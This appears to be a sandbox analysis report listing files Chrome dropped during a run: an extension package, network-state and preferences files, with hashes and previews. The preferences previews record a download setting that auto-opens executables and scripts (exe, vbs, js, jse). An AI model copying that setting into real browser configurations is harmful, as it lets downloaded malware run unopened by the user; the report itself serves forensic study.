Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	9419
Entropy (8bit):	7.925159491819897
Encrypted:	false
SSDEEP:	192:cUyvLGbeIU8i4Vua0ILg6tuyqlCUtd8n9p4aimegsai+rt:PyjU0a0ILgOZ26zjt
MD5:	AC1A5B29CB8C1984BF9D47EBC28C6C0B
SHA1:	41D27BB0BCC44BAACF6260B15C233D92652201B3
SHA-256:	E9F5E92EC8F10E9A09F8F50692AC37119E843F3E6938E602B7C5DD248AD8F593
SHA-512:	582D18621DBD0B8DFC03FEFF01EE8E28F7BB58B8F0BB991CD1238D4116E35DA59075E9CCE08CB2BDD1C1BA1664CBC4B51615BDFAAC13118CBBFA80EE8E12D17D
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<..............y...f.A......V....X...4..1..Jg..:...I......#.f..P...N..P..~O..9LP..k{NP..R.....wP.yw......D.....].yc.eT..../.VC%D.......j.JgP...2..3..a...c...q.t...4_.o.WpUAZ.$.%kB.~.... ....Ir.HM.'...A.."W.....L3.a.\|...b..%.5d...qy..s.......'.VT}@..^...<.......(..w...K..)&..3RR6.<.g`.e.b..P.+.E$...:....../E..`Y...r.....vT.i...V.).N,..F.Z....~XQ.u...Ev...=......u~<.z...8.}rE.,tQhX.rFz.^1.\|@.....<I...x7.s...i...@.8.k.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\f61e523a-b4e0-43de-92d9-d65c5dedd082:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	172
Entropy (8bit):	5.386205294326134
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaR8dDR9A+F/8b3iDrVXqogppEi0o/:qY3tNp40zMw/yHNKREXA+FWiDrlgppLd
MD5:	D5C72B00E89E9C7BF530B44D6378A05C
SHA1:	7CC976EBD4240CD4F2F72021241D6D47D9BE13B6
SHA-256:	5FCB0BCCAFD16D8E5BBF3043BBF01E7CAE2755999DE985517FBB2C95C1F7D5BD
SHA-512:	7BD7B127CE1D68ACA0C546DCF3ECC03DE8EE6BC331954FC71E035ACEC397C6E65443EFE3CF1C95DFD6C636DAC0ACEA6944734231E5A7553F6643FBAAB42C1008
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=2202180000&target=OPTIMIZATION_TARGET_SEGMENTATION_CHROME_LOW_USER_ENGAGEMENT..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\4b709b01-e870-47b9-ae10-70280641a7c8.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	5.5858928662819824
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+h6UUleU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+YUUAU+9IKUf4sU+uQUfJU9
MD5:	D89871CCE2B625D5B9488E3963CF8208
SHA1:	148CC928493D8EED9F3B2A684D74C167EFD646B4
SHA-256:	AC9271E68C08B5B970415E1420504A20BC7BCFEA1124669183494F40B40FED0D
SHA-512:	5A026A68EDEFE82CE3CF3E04D9CB160C637727395453090CF7AA87AD0E197E44AEF59B42E8DB9F1925F23D72F27B63EA90BD1AE188D82DF2FF0D5793361080CE
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692787360.537385,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661251360.537391},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\533e3d76-2de4-4d10-98f9-444ce9ece48a.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7701
Entropy (8bit):	4.876348815046644
Encrypted:	false
SSDEEP:	192:MSj/hChIPlX4rImZpZb8O6L6RtqrcRFtaSlACtanVXMZ+fp00DqQ4nVBU642b+y1:MSj/hMIPlX4rImZpZb8O6L6R0rcRFtaE
MD5:	42796EBE0ECC5C9CD8A7E7DB91BF3CC3
SHA1:	92EA88457976B018883ECB4883F39DAF7E0F5529
SHA-256:	6AA4D3DD787D53099EE5F2E2ED3F375229579C8877ADD2C982FDD1F041C910FE
SHA-512:	05C824A11AFC16AC60DD4E21A7ABF030529E17BD6D5866A6B7183C33C9CBE93AB39ABAB783B014D9AAAEC75668E31C8FD24EDA43E805E27BF6B75C8949108A80
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751336019893","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19357},"server":"https://www.googletagmanager.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751337575357","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20443},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751336231833","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":23646},"server":"https://www.google-analytics.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":[],"expiration":"13307749903829724","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":28412},"server":"https://tools.google.com"},{"alternative_service":[{"advertised_alpns":[],"expiration":"133077499

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\71e60504-ec55-433d-9fac-c188ef556eb9.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	8041
Entropy (8bit):	4.8762438677486575
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSj+ikPM:MY9+y4+U6VB0+pTIenVUM8vKShAhRRHZ
MD5:	6CC90C844A0436D4CD31F7026CA15671
SHA1:	79E880024535A0AC712AD337B07177213C384E9D
SHA-256:	19694C25AD1D6BD4564B82D64A842EF25B11EE5C083BDA44C180E1A930ED74E3
SHA-512:	E0C6D473B6FA6348FB9B417BD91ED34873706816593434A07CD257B9C29BE28589DF261F740CF5D0E69CAEA4EFF50DD47BEB43753C944D0E42729061CCC51B64
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\9af4a127-5026-4c05-873d-8df80c4c3699.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1705
Entropy (8bit):	5.582638530944839
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+w6UU2ReU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+5UU2UU+9IKUf4sU+uQUfJ6
MD5:	603448480213BAEE7BECCA6316758226
SHA1:	A72055536DCE4F1890F191123A87504D35096521
SHA-256:	754801D24C1456E6696E48356107ECCA175C3A9267A7EF79904698E2D82CF8D6
SHA-512:	BEA851543F908A25342327EA108128C737155F3E13CDF5BDB6938CB82308F976D69CB6980BDF0B32DAF4944387C2A39560DF50D2D3249EA718CBB74F2D0316AA
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692787419.694916,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661251419.69492},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obse

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8041
Entropy (8bit):	4.876582082572874
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSj+ikPW:MY9+y4+U6VB0+pTIenVUM8vKShAhRRH3
MD5:	8D26969B3D9D6E7BDF358073D1D1AA2D
SHA1:	411B75ABA508965E641CF68249A56C9D7D8E6F8D
SHA-256:	8D9879C311CBAFEAB11A3A5D46D7827373662641D3CB5D7B4473901A39CF10CB
SHA-512:	447DCBE24034E971EF024650512FFA3CE92CC23E9054089C18FE7C673AAAC1AE95ED2B2FF637C7666B10CD5ECA8A2741A65760D8D57DD9FA8BF6A38D92FB7F0A
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1705
Entropy (8bit):	5.5830692959686266
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+QM6UUxLfeU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+mUUtmU+9IKUf4sU+uQUfJ6
MD5:	18EA2CAB0E3C7BA0C1BB00CC0DC36657
SHA1:	61F5396D104943DEDAD628FBAA8801AFE6A4F6DA
SHA-256:	E7C3E2374E33E69551567064B795A50CD18C20A8C774DF0ADAF294522AB66B3D
SHA-512:	75BE163D2EC5951D20FCFA7309B86D6AF28B9ADF322A737969C403F4E1F55608E628E597679499F12D5EE7CF7EED61691644F3777E0B882B7CFEF560BC9C2433
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692787476.30271,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661251476.302715},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obse

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\ac6efe08-197c-4b5e-8543-14df018c313e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1705
Entropy (8bit):	5.5830692959686266
Encrypted:	false
SSDEEP:	48:Y0WeU+aieU+QM6UUxLfeU+9IKUfyTsU+uQUfmpwU+UwluU+w1UfD:bWeU+aieU+mUUtmU+9IKUf4sU+uQUfJ6
MD5:	18EA2CAB0E3C7BA0C1BB00CC0DC36657
SHA1:	61F5396D104943DEDAD628FBAA8801AFE6A4F6DA
SHA-256:	E7C3E2374E33E69551567064B795A50CD18C20A8C774DF0ADAF294522AB66B3D
SHA-512:	75BE163D2EC5951D20FCFA7309B86D6AF28B9ADF322A737969C403F4E1F55608E628E597679499F12D5EE7CF7EED61691644F3777E0B882B7CFEF560BC9C2433
Malicious:	false
Reputation:	unknown
Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692787476.30271,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661251476.302715},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obse

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\d94e5778-576a-4898-b41a-549a600e1afa.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	8041
Entropy (8bit):	4.876582082572874
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSj+ikPW:MY9+y4+U6VB0+pTIenVUM8vKShAhRRH3
MD5:	8D26969B3D9D6E7BDF358073D1D1AA2D
SHA1:	411B75ABA508965E641CF68249A56C9D7D8E6F8D
SHA-256:	8D9879C311CBAFEAB11A3A5D46D7827373662641D3CB5D7B4473901A39CF10CB
SHA-512:	447DCBE24034E971EF024650512FFA3CE92CC23E9054089C18FE7C673AAAC1AE95ED2B2FF637C7666B10CD5ECA8A2741A65760D8D57DD9FA8BF6A38D92FB7F0A
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\f9495f31-9a37-49ae-819b-ee133834b0bb.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7819
Entropy (8bit):	4.876128405124674
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSj+iqVK:MY9+y4+U6VB0+pTIenVUM8vKShAhRRHT
MD5:	6D3683CA5957543523F8D9A2532FF780
SHA1:	B92FDA3471474A5C5B528D8F80BD372E011A9DBC
SHA-256:	AF6CB52CA3753C0729A0AA93B091CF363D2E01C09E14B45AFDA74582230DB299
SHA-512:	01BFF1188ECA647D301CA3CD37B0AFBB533181D606EA9549894A229787304F032A0C8B22C8FC53F69EB8C6EA1F853EE16252EA6453D4814E7CC452EF2DFB5F95
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9589
Entropy (8bit):	5.152897761132475
Encrypted:	false
SSDEEP:	192:YYP1XcaY88yy+F3p7YzkhOkoazwbdplKiWQbDYpqn0ttjEsXtSct:YOpSyx3664u6YtIsXtSct
MD5:	8B345F85F1D7824A78D19A6766FD4AEB
SHA1:	41CC2C485AEEC2D305E7C5635128761C875A69B7
SHA-256:	28102768E049E06B0B1970621823E4AD0FF68937F1EDF188C1CDA2A101AED8B2
SHA-512:	97284FD4F0816CAC03269CC14E0011164C9E4CF74E77AB226715B93C494E1AC8CDC5622064E631B0B8123B898ACF026BFDF640763A107AF0CBDC6A2EBBFAF934
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14764
Entropy (8bit):	5.567850350056405
Encrypted:	false
SSDEEP:	384:0HqLlmXE1kXqKf/pUZNCgVLH2HftorUyQhY42:zLlsE1kXqKf/pUZNCgVLH2HfyrUhhYl
MD5:	CB389506F3BB0DC615248D86BDBF5102
SHA1:	2D2C03C7F0AB5BC9679D311A38894C8737827F05
SHA-256:	BB8C3E6CFBD970DD49577FC44EADF63AC312EA365BB0C0564F561011D03A1E33
SHA-512:	31329299411364911747E2D3DC20F3811341C6F11D49E6943FC5F81E822A2AD38848092DF72E805E55AD71632853BC4AFA563CEDAAFB4BF0E9F6C614F790C5ED
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305724951145714","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Trusted Vault (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.923181998146334
Encrypted:	false
SSDEEP:	3:pFAPYQQVNv3BNn:UPS37
MD5:	6D942EE72911F2427FBA8B925074BA8C
SHA1:	9B197EF0996B7876FC1766B27193501CF2DB9977
SHA-256:	5B378488065252B2F12128D6A4DE60DC05FF044D484A8BF1D61E92E52FABA396
SHA-512:	56CBCC627045B0B322190738D0637AD9A536107C1598367238F163BCBF7DF829B1A38295BE2EE583D5A5DF0CBF3EBD17AB7EE044BC15C5C9CDCAC2E6ABE5B72A
Malicious:	false
Reputation:	unknown
Preview:	v10..e.....A....9..W.`..P.&.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a224fdf7-47cb-467d-9b47-b50f821224ae.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14276
Entropy (8bit):	5.573135553381216
Encrypted:	false
SSDEEP:	384:0RoLlmXT1kXqKf/pUZNCgVLH2Hft4rUH1hY4e:xLlsT1kXqKf/pUZNCgVLH2HfWrUVhYx
MD5:	AA3EAF6E20ECAB8E5E8E2D6C3E1258F2
SHA1:	FF23F0591BE12BA714038F98E0C07EBD02688C06
SHA-256:	5FA542AAEC98C38B28BC47CD1D7CE7DC0DF0452F123601BB714A31627007F769
SHA-512:	F6DA75D707E8C8C2696BF05263537BB7C3BEA366036FF31F953E712C33D50A24E8FA9613608C04C7D1774DF32E3F9B6D0FAE1D087DE0F5A217379BD876405EAC
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305724951145714","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\acf30fc5-b727-4b98-b96d-4549bc43781b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9589
Entropy (8bit):	5.152897761132475
Encrypted:	false
SSDEEP:	192:YYP1XcaY88yy+F3p7YzkhOkoazwbdplKiWQbDYpqn0ttjEsXtSct:YOpSyx3664u6YtIsXtSct
MD5:	8B345F85F1D7824A78D19A6766FD4AEB
SHA1:	41CC2C485AEEC2D305E7C5635128761C875A69B7
SHA-256:	28102768E049E06B0B1970621823E4AD0FF68937F1EDF188C1CDA2A101AED8B2
SHA-512:	97284FD4F0816CAC03269CC14E0011164C9E4CF74E77AB226715B93C494E1AC8CDC5622064E631B0B8123B898ACF026BFDF640763A107AF0CBDC6A2EBBFAF934
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

